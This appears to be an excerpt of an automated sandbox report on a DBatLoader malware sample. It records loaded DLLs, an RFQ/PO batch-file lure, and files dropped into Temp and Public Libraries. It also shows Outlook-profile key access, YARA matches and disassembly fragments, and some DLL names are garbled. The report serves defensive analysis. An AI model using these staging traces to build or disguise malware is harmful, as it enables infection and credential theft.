Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: version.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: url.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: dbghelp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppwmi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: slc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppcext.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: winscard.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: devobj.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section loaded: msasn1.dll

Source: C:\Users\user\AppData\Local\Temp\x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: TrojanAIbot.exe.lnk.14.dr

LNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat

Static file information: File size 1393123 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1472715771.00000000022E6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1441667884.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1445817918.0000000005170000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.1474717040.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1446636535.000000002212F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1446636535.00000000220FE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330164805.00000000028C9000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1472715771.00000000022E6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.1441667884.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1445817918.0000000005170000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 4.2.x.exe.2e40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: lxsyrsiW.pif.4.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02E5894C LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02E5894C

Source: armsvc.exe.12.dr	Static PE information: real checksum: 0x32318 should be: 0x140311
Source: neworigin.exe.12.dr	Static PE information: real checksum: 0x0 should be: 0x480db
Source: x.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x15c6e6
Source: server_BTC.exe.12.dr	Static PE information: real checksum: 0x0 should be: 0x42478
Source: lxsyrsiW.pif.4.dr	Static PE information: real checksum: 0x0 should be: 0x1768a
Source: Wisrysxl.PIF.10.dr	Static PE information: real checksum: 0x0 should be: 0x15c6e6
Source: TrojanAIbot.exe.14.dr	Static PE information: real checksum: 0x0 should be: 0x42478

Source: alpha.pif.8.dr	Static PE information: section name: .didat
Source: armsvc.exe.12.dr	Static PE information: section name: .didat

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E6D2FC push 02E6D367h; ret	4_2_02E6D35F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E463AE push 02E4640Bh; ret	4_2_02E46403
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E463B0 push 02E4640Bh; ret	4_2_02E46403
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E6C378 push 02E6C56Eh; ret	4_2_02E6C566
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E4C349 push 8B02E4C1h; ret	4_2_02E4C34E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E4332C push eax; ret	4_2_02E43368
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E6D0AC push 02E6D125h; ret	4_2_02E6D11D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E5306C push 02E530B9h; ret	4_2_02E530B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E5306B push 02E530B9h; ret	4_2_02E530B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E6D1F8 push 02E6D288h; ret	4_2_02E6D280
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E6D144 push 02E6D1ECh; ret	4_2_02E6D1E4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E5F108 push ecx; mov dword ptr [esp], edx	4_2_02E5F10D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E46784 push 02E467C6h; ret	4_2_02E467BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E46782 push 02E467C6h; ret	4_2_02E467BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E4D5A0 push 02E4D5CCh; ret	4_2_02E4D5C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E4C56C push ecx; mov dword ptr [esp], edx	4_2_02E4C571
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E6C570 push 02E6C56Eh; ret	4_2_02E6C566
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E5AAE0 push 02E5AB18h; ret	4_2_02E5AB10
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E58AD8 push 02E58B10h; ret	4_2_02E58B08
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E4CA4E push 02E4CD72h; ret	4_2_02E4CD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E4CBEC push 02E4CD72h; ret	4_2_02E4CD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E5886C push 02E588AEh; ret	4_2_02E588A6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02EB4850 push eax; ret	4_2_02EB4920
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E56946 push 02E569F3h; ret	4_2_02E569EB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E56948 push 02E569F3h; ret	4_2_02E569EB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E5790C push 02E57989h; ret	4_2_02E57981
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E55E7C push ecx; mov dword ptr [esp], edx	4_2_02E55E7E
